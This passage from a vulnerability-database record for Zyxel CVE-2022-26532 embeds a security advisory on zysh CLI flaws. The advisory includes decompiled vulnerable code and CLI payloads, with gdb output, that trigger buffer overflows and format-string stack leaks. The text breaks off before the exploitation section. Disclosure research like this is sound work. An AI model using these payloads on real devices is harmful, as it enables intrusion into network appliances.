                    "cpe23Uri": "cpe:2.3:o:zyxel:wax610d_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.30\\(abte.2\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wax610d:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wax630s_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.30\\(abzd.2\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wax630s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wax650s_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.30\\(abrm.2\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wax650s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-26532"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Marco Ivaldi",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "167464"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2022-26532",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2022-26532",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2022-26532",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "security@zyxel.com.tw",
            "id": "CVE-2022-26532",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202205-3999",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2022-26532",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-26532"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-26532"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-26532"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A argument injection vulnerability in the \u0027packet-trace\u0027 CLI command of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71, USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware versions 4.32 through 5.21, VPN series firmware versions 4.30 through 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500 firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2) and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and earlier versions, that could allow a local authenticated attacker to execute arbitrary OS commands by including crafted arguments to the CLI command. --[ HNS-2022-02 - HN Security Advisory - https://security.humanativaspa.it/\n\n* Title: Multiple vulnerabilities in Zyxel zysh\n* Products: Zyxel firewalls, AP controllers, and APs\n* Author: Marco Ivaldi \u003cmarco.ivaldi@hnsecurity.it\u003e\n* Date: 2022-06-07\n* CVE Names and Vendor CVSS Scores:\n  CVE-2022-26531: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H (6.1)\n  CVE-2022-26532: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (7.8)\n* Advisory URLs:\n  https://github.com/hnsecurity/vulns/blob/main/HNS-2022-02-zyxel-zysh.txt\n  https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml\n\n\n--[ 0 - Table of contents\n\n1 - Summary\n2 - Background\n3 - Vulnerabilities\n4 - Analysis\n    4.1 - Buffer overflows in the \"configure terminal \u003e diagnostic\" command\n    4.2 - Buffer overflow in the \"debug\" command\n    4.3 - Buffer overflow in the \"ssh\" command\n    4.4 - Format string bugs in the \"extension\" argument of some commands\n    4.5 - OS command injection in the \"packet-trace\" command\n5 - Exploitation\n    5.1 - Buffer overflows\n    5.2 - Format string bugs\n    5.3 - OS command injection\n6 - Affected products\n7 - Remediation\n8 - Disclosure timeline\n9 - References\n\n\n--[ 1 - Summary\n\n\"We live on a placid island of ignorance in the midst of black seas of\ninfinity, and it was not meant that we should voyage far.\"\n                               -- H. P. Lovecraft, The Call of Cthulhu\n\nWe have identified multiple security vulnerabilities in the zysh binary\nthat implements the command-line interface (CLI) on a wide range of Zyxel\nproducts, including their security appliances such as those in the Unified\nSecurity Gateway (USG) product line:\n\n* Multiple stack-based buffer overflows in the code responsible for\n  handling diagnostic tests (\"configure terminal \u003e diagnostic\" command). \n* A stack-based buffer overflow in the \"debug\" command. \n* A stack-based buffer overflow in the \"ssh\" command. \n* Multiple format string bugs in the \"extension\" argument of the \"ping\",\n  \"ping6\", \"traceroute\", \"traceroute6\", \"nslookup\", and \"nslookup6\"\n  commands. \n* An OS command injection vulnerability in the \"packet-trace\" command. \n\nWe demonstrated the possibility to exploit the format string bugs and the\nOS command injection vulnerability to escape the restricted shell\nenvironment and achieve arbitrary command execution on the underlying\nembedded Linux OS, respectively as regular user and as root. \n\n\n--[ 2 - Background\n\nThe zysh binary is a restricted shell that implements the command-line\ninterface (CLI) on multiple Zyxel [0] products. All regular user accounts\nhave an /etc/passwd entry similar to the following:\n\nadmin:x:10007:10000:Administration account...:/etc/zyxel/ftp:/bin/zysh\n\nOnly the root user and the reserved debug account, disabled by default,\nhave access to a proper bash shell:\n\nroot:x:0:0:root\u0026admin\u0026120\u0026120\u0026480\u0026480\u00261\u00260:/root:/bin/bash\n... \ndebug:!:0:0:Debug Account:/root:/bin/bash\n\nThe Zyxel CLI can be accessed via SSH as follows:\n\nraptor@blumenkraft ~ % ssh \u003cREDACTED\u003e -l admin\n(admin@\u003cREDACTED\u003e) Password:\nRouter\u003e # hello zysh!\n\nOn our Zyxel USG20-VPN test device, the CLI can also be accessed via Telnet\n(not enabled by default) or via the so-called Web Console, implemented with\nWebSockets, that is reachable with a web browser after authentication, at a\nURL such as the following:\n\nhttps://\u003cREDACTED\u003e/webconsole/\n\nIn the context of a wider audit of the security posture of Zyxel devices\n[1], we decided to audit zysh with the primary goal of escaping the\nrestricted shell environment and executing arbitrary commands on the\nunderlying embedded Linux OS. It is pretty large for a dynamically-linked,\nstripped binary (~19MB) and it makes plenty of unsafe API function calls,\nwhich makes it an interesting target. \n\n\n--[ 3 - Vulnerabilities\n\nDuring our audit of the zysh binary, we identified the following\nvulnerabilities:\n\n* Multiple stack-based buffer overflows in the code responsible for\n  handling diagnostic tests (\"configure terminal \u003e diagnostic\" command). \n* A stack-based buffer overflow in the \"debug\" command. \n* A stack-based buffer overflow in the \"ssh\" command. \n* Multiple format string bugs in the \"extension\" argument of the \"ping\",\n  \"ping6\", \"traceroute\", \"traceroute6\", \"nslookup\", and \"nslookup6\"\n  commands. \n* An OS command injection vulnerability in the \"packet-trace\" command. \n\nAll buffer overflows can be triggered only by admin users, while the format\nstring bugs and the command injection vulnerability are exploitable by\nauthenticated users of either admin or limited-admin type. \n\n\n--[ 4 - Analysis\n\nTo follow along with our detailed vulnerability analysis, you can download\nthe Zyxel Firmware 5.10 for \"USG20-VPN - ABAQ - Non-Wireless Edition\"\n(USG20-VPN_5.10.zip [2]). Extract the ZIP archive, then extract the\npassword-protected ZIP archive 510ABAQ0C0.bin contained within, using the\nfollowing password [1]:\n\n4ulPPIs94jnYwUfwwoTqz/a5eRHFRwNYq8zFTrQZaE7XkoTgdzWc.6jea1v1zJb \n\nFinally, extract the Squashfs filesystem image with binwalk or a similar\ntool, e.g.:\n\nraptor@blumenkraft 510ABAQ0C0 % binwalk -e compress.img\n\nThe target binary we will reference throughout our analysys is /bin/zysh,\navailable in the extracted filesystem:\n\nraptor@blumenkraft bin % ls -l zysh\n-rwxr-xr-x  1 raptor  staff  19727292 Sep 23 18:33 zysh*\nraptor@blumenkraft bin % shasum -a 256 zysh\n47ee711a817e33bb2809e91d76b512498ae3cdca1276a2385f404384547404e3  zysh\nraptor@blumenkraft bin % file zysh\nzysh: ELF 32-bit MSB executable, MIPS, N32 MIPS64 rel2 version 1 (SYSV),\ndynamically linked, interpreter /lib32/ld.so.1, for GNU/Linux 2.6.9,\nstripped\n\nYou can easily import it in your favorite disassembler. In Ghidra, we had\nto manually tweak the import options to reflect that the binary was\ncompiled for the N32 ABI [3], importing it as \"MIPS:BE:64:64-32addr:n32\". \nThe same requirement holds for any other binaries compiled for the Cavium\nOcteon III processor, on which our Zyxel USG20-VPN test device is based. \n\n\n--[ 4.1 - Buffer overflows in the \"configure terminal \u003e diagnostic\" command\n\nThe first buffer overflow vulnerability we identified is located in the\nfunction at 0x1013b238, which we dubbed do_emtap():\n\nundefined8 do_emtap(longlong argc, char **argv)\n{\n... \n  char acStack305[129];\n... \n  else {\n    uVar1 = 1;\n    if (argc == 3) {\n      sprintf(acStack305 + 1, \"t%s.sh\", argv[2]); /* VULN #1 */\n      pcVar4 = argv[1];\n      do_emtap_test(pcVar4, acStack305 + 1);\n      do_emtap_test2(pcVar4, acStack305 + 1);\n      report_test();\n      uVar1 = 0;\n    }\n  }\n  return uVar1;\n}\n\nThis function is called when an admin user invokes the diagnostic test\nfunctionality in the Zyxel CLI with two arguments, e.g.:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test \u003ctest_name\u003e \u003ctest_num\u003e\n\nThe buffer overflow happens due to the unsafe sprintf() call marked with\nthe \"VULN #1\" comment above, which overflows past the boundary of the\nacStack305 array allocated on the stack with the contents of the \u003ctest_num\u003e\nargument. \n\nUpon exploitation, however, the return statement at 0x1013b2f4 is never\nreached, because the overflow propagates to the other functions that are\ncalled by do_emtap(), which we dubbed do_emtap_test() and do_emtap_test2()\nin the pseudo-code above. More precisely, another overflow happens at the\nsprintf() call below marked as \"VULN #2\", located in the do_emtap_test()\nfunction at 0x1013a8f8. This overflow enables us to gain control over the\npc register when do_emtap_test() returns:\n\nint do_emtap_test(char *test_name, char *test_num)\n{\n... \n  char acStack320[128];\n  char acStack192[128];\n... \n  sprintf(acStack320, \"%s/%s\", \"/tmp/tap\", test_name); /* VULN #3 */\n  mkdir(acStack320, 0x1c0);\n  sprintf(acStack192, \"%s/%s/%s\", \"/usr/local/emtap/test_script\",\n          test_name, test_num); /* VULN #2 */\n  iVar1 = access(acStack192, 0);\n  if (iVar1 != 0) {\n    return 1;\n  }\n... \n}\n\nThe unsafe sprintf() call overflows past the boundary of the acStack192\narray. When do_emtap_test() returns, we are able hijack the control flow. \nHowever, we can only use numeric characters in our hostile buffer,\ntherefore exploitation is extremely unlikely, if at all possible. The\noverflow can be triggered with the following payload:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test anything 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\nProgram received signal SIGBUS, Bus error. \n0x31313130 in ?? ()\n\nA slightly better opportunity for exploitation is represented by another\nstack-based buffer overflow in the above function, marked with the \"VULN\n#3\" comment. This specific overflow can be triggered with the following\npayload:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 1\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nThis time, our hostile buffer can contain alphanumeric characters in the\nrange [a-zA-Z0-9], plus the underscore \u0027_\u0027. Still far from ideal, but\ndefinitely better than the previously identified exploitation vector.  \n\nA similar vector is provided by yet another stack-based buffer overflow,\nthis time in the function located at 0x1013ada0, which we dubbed\ndo_emtap_test3():\n\nundefined8 do_emtap_test3(char *test_name)\n{\n... \n  char acStack288[127];\n... \n  sprintf(acStack288, \"%s %s/%s | %s -E \\\u0027t[0-9]+\\\\.sh\\\u0027 \u003e %s\", \"/bin/ls\",\n\t  \"/usr/local/emtap/test_script\", test_name, \"/bin/grep\",\n          \"/tmp/tap/test_case_dir.tmp\"); /* VULN #4 */\n  system(acStack288);\n... \n    sprintf(acStack288, \"%s %s\", \"/bin/rm\", \"/tmp/tap/test_case_dir.tmp\");\n    system(acStack288);\n    return 0;\n  }\n... \n}\n\nThis function is called when an admin user invokes the diagnostic test\nfunctionality in the Zyxel CLI with only one argument, e.g.:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test \u003ctest_name\u003e\n\nThis time, the unsafe sprintf() call marked with the \"VULN #4\" comment\noverflows past the boundary of the acStack288 array. By exploiting this\noverflow, we can once again overwrite the pc register and hijack the\ncontrol flow. In order to trigger this overflow, the following payload can\nbe used:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n/bin/ls: cannot access /usr/local/emtap/test_script/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nIn the mentioned functions, including the one located at 0x1013aa10 that we\ndubbed do_emtap_test2() and that is not immediately reachable via the\ncodepaths triggered by our hostile inputs, there are other instances of\nbuffer overflow caused by the unchecked use of unsafe API functions, such\nas sprintf() and strcpy(). We have not deeply investigated their actual\nreachability, but they should be fixed as well. In addition, many unsafe\nprogramming constructs are present in the rest of the binary. \n\n\n--[ 4.2 - Buffer overflow in the \"debug\" command\n\nThe buffer overflow vulnerability we identified in the code responsible for\nhandling the \"debug\" command is located in the function at 0x1000df70,\nwhich we dubbed do_debug(). \n\nIt is a pretty long function that gets called when an admin (or in some\ncases a limited-admin) user invokes the debug functionality in the Zyxel\nCLI, e.g.:\n\nRouter\u003e debug \u003cargument list\u003e\n\nTo trigger the overflow, the following payload can be used:\n\nRouter\u003e debug gui webhelp redirect AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nRouter\u003e debug gui show webhelp redirect\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nThe first command writes a long string in the /tmp/webhelppath file:\n\nint do_debug(ulonglong argc, char **argv)\n{\n... \n  case 0x155:\n    if (DAT_1145e55c != 0x150) {\n      return 0;\n    }\n    pcVar11 = \"/tmp/webhelppath\";\n    if (DAT_1145e564 != 0x154) {\n      return 0;\n    }\nLAB_1000ebdc:\n    pFVar12 = fopen64(pcVar11, \"w\"); /* open file */\n... \n    fputs(argv[4], pFVar12); /* write string to file */\n    fclose(pFVar12);\n    return 0;\n}\n\nThe second command triggers the overflow by reading from the\n/tmp/webhelppath file:\n\nint do_debug(ulonglong argc, char **argv)\n{\n... \n  undefined8 local_e0;\n... \n    if (lVar24 == 0x155) {\n      pFVar12 = fopen64(\"/tmp/webhelppath\", \"r\");\n... \n\t__isoc99_fscanf(pFVar12, \"%s\", \u0026local_e0); /* VULN #5 */\n        fclose(pFVar12);\n        fwrite(\u0026DAT_1013fe18, 1, 9, stdout);\n        puVar22 = \u0026local_e0;\n        pcVar11 = \"Webhelp redirect: %s\\n\";\n      }\nLAB_1000f7d0:\n      fprintf(stdout, pcVar11, puVar22);\n      fwrite(\u0026DAT_1013fe48, 1, 2, stdout);\n      return 0;\n    }\n\nThe vulnerability lies in the use of the unsafe __isoc99_fscanf() API\nfunction, which does not check if the destination string is large enough to\naccommodate the whole source string. This allows us to overwrite the saved\nreturn address and hijack the control flow. Our hostile buffer is limited\nto a length of 255 bytes and can contain only alphanumeric characters in\nthe range [a-zA-Z0-9], plus the underscore \u0027_\u0027, dash \u0027-\u0027, and dot \u0027.\u0027\nspecial characters. \n\nA similar bug can be triggered with the \"debug gui kb redirect\" and \"debug\ngui show kb redirect\" command combination. However, in this case, the\ndestination buffer is too far away from the location where the return\naddress is saved on the stack, therefore we cannot exploit this bug to\ncontrol the pc register. We do not exclude other ways to exploit this\nvulnerability. \n\n\n--[ 4.3 - Buffer overflow in the \"ssh\" command\n\nThe buffer overflow vulnerability we identified in the code responsible for\nhandling the \"ssh\" command is located in the function at 0x10012298, which\nwe dubbed do_ssh():\n\nundefined8 do_ssh(int argc, char **argv)\n{\n... \n  char acStack336[300];\n... \n  sprintf(acStack336, \"/usr/bin/ssh -o UserKnownHostsFile=/dev/null %s\",\n    argv[1]); /* VULN #5 */\n... \n    sVar4 = strlen(acStack336);\n    sprintf(acStack336 + sVar4, \" -p %s\", *(undefined4 *)((int)argv +\n        iVar2)); /* VULN #6 */\n... \n}\n\nYou know the gist by now: there are two stack-based buffer overflows caused\nby the unchecked use of the unsafe API function sprintf(). To trigger the\nfirst overflow the following payload can be used, as an authenticated admin\nor limited-admin user:\n\nRouter\u003e ssh AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1\nThe authenticity of host \u0027127.0.0.1 (127.0.0.1)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:fzNloEaOsmNQLHbhjroUVHkJC9ZTH09A6TRjyK+oiys. \nAre you sure you want to continue connecting (yes/no/[fingerprint])? yes\nWarning: Permanently added \u0027127.0.0.1\u0027 (RSA) to the list of known hosts. \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1\u0027s password:\n[press enter a few times]\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nOnce again, our hostile buffer can contain only alphanumeric characters,\nplus some special characters. As a side note, we noticed that we can inject\narguments that get passed to the underlying /usr/bin/ssh command, albeit\nwith some limitations:\n\nRouter\u003e ssh -@127.0.0.1\nunknown option -- @\nusage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]\n           [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]\n           [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]\n           [-i identity_file] [-J [user@]host[:port]] [-L address]\n           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]\n           [-Q query_option] [-R address] [-S ctl_path] [-W host:port]\n           [-w local_tun[:remote_tun]] destination [command]\n\nBased on our analysis, this lack of input filtering is not exploitable to\ninject interesting command-line arguments (e.g. \"-o ProxyCommand=...\"):\n\nRouter\u003e ssh -oProxyCommand@127.0.0.1\ncommand-line: line 0: Bad configuration option: proxycommand@127.0.0.1\nRouter\u003e ssh -oProxyCommand=@127.0.0.1\n% (after \u0027ssh\u0027): Parse error\nretval = -1\nERROR: Parse error/command not found!\n\n--[ 4.4 - Format string bugs in the \"extension\" argument of some commands\n\nSome zysh commands implement a special \"extension\" argument that allows to\nspecify arbitrary command-line arguments to be passed to the invoked OS\ncommand that underlies each functionality:\n\nRouter\u003e ping 127.0.0.1\n;\n\u003ccr\u003e\ncount\nextension\nforever\ninterface\nsize\nsource\n|\n\nFor instance, if we enter the following zysh command:\n\nRouter\u003e ping 127.0.0.1 extension -c 1\n\nThe OS command line below will be executed via the function located at\n0x101295d0, which we dubbed my_invoke():\n\n$ /bin/zysudo.suid /bin/ping 1.1.1.1 -n -c 3  -c 1\n\nAs you can see, the additional arguments we specified after the \"extension\"\nkeyword are appended to the OS command line. \n\nWe identified format string bugs in the following zysh commands:\n\n* \"ping\" and \"ping6\" commands, handled by the function at 0x1000c0a0, which\n  we dubbed do_ping(). \n* \"traceroute\" and \"traceroute6\" commands, handled by the function at\n  0x1000bc58, which we dubbed do_traceroute(). \n* \"nslookup\" and \"nslookup6\" commands, handled by the function at\n  0x1000c718, which we dubbed do_nslookup(). \n\nThe relevant pseudo-code snippets are:\n\nundefined8 do_ping(int argc, char **argv, char *cmd)\n{\n... \n  if (iVar9 != 0) {\n    sVar5 = strlen(acStack880);\n    pcVar1 = ppcStack96[iVar9 + 1];\n    acStack880[sVar5] = \u0027 \u0027;\n    acStack880[sVar5 + 1] = \u0027\\0\u0027;\n    strcpy(acStack880 + sVar5 + 1, pcVar1); /* append extension args */\n  }\n  if (iVar8 == 0) {\n    sprintf(acStack4976, acStack880); /* VULN: format string bug */\n    __pid = fork();\n... \n}\n\nundefined8 do_traceroute(int argc, char **argv, char *cmd)\n{\n... \n  if (iVar10 != 0) {\n    sVar6 = strlen(acStack864);\n    pcVar2 = argv[iVar10 + 1];\n    acStack864[sVar6] = \u0027 \u0027;\n    acStack864[sVar6 + 1] = \u0027\\0\u0027;\n    strcpy(acStack864 + sVar6 + 1, pcVar2); /* append extension args */\n  }\n... \nLAB_1000be10:\n  sprintf(acStack4960,acStack864); /* VULN: format string bug */\n  __pid = fork();\n... \n}\n\nundefined8 do_nslookup(int argc, char **argv)\n{\n... \n  pcVar4 = stpcpy((char *)((int)\u0026uStack832 + sVar3 + 1), \n      *(char **)((int)argv + iVar2));\n  if (iVar8 != 0) {\n    pcVar4[1] = \u0027\\0\u0027;\n    *pcVar4 = \u0027 \u0027;\n    strcpy(pcVar4 + 1, argv[iVar8 + 1]); /* append extension args */\n  }\n... \n  sprintf(acStack4928, (char *)\u0026uStack832); /* VULN: format string bug */\n  __pid = fork();\n... \n}\n\nAs a side note, in the \"nslookup\" and \"nslookup6\" commands there is also a\nbonus stack-based buffer overflow that is not large enough to reach the\nsaved return address. It can be reproduced with the following payload:\n\nRouter\u003e nslookup AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA server AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA extension AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nProgram received signal SIGBUS, Bus error. \n0x1000ba10 in _ftext ()\n(gdb) x/i $pc\n=\u003e 0x1000ba10 \u003c_ftext+17776\u003e: lw  v1,-10184(s0)\n(gdb) i r s0\ns0: 0x4141414141414141\n\nTo reproduce the format string bugs and leak stack memory contents or crash\nzysh, instead, the following payloads can be used:\n\nRouter\u003e # stack memory leak\nRouter\u003e ping 127.0.0.1 extension %x%x%x%x\nping: unknown host 6eb83a7580808080fefeff001145e560\nRouter\u003e # crash\nRouter\u003e ping 127.0.0.1 extension %n%n%n%n\nProgram received signal 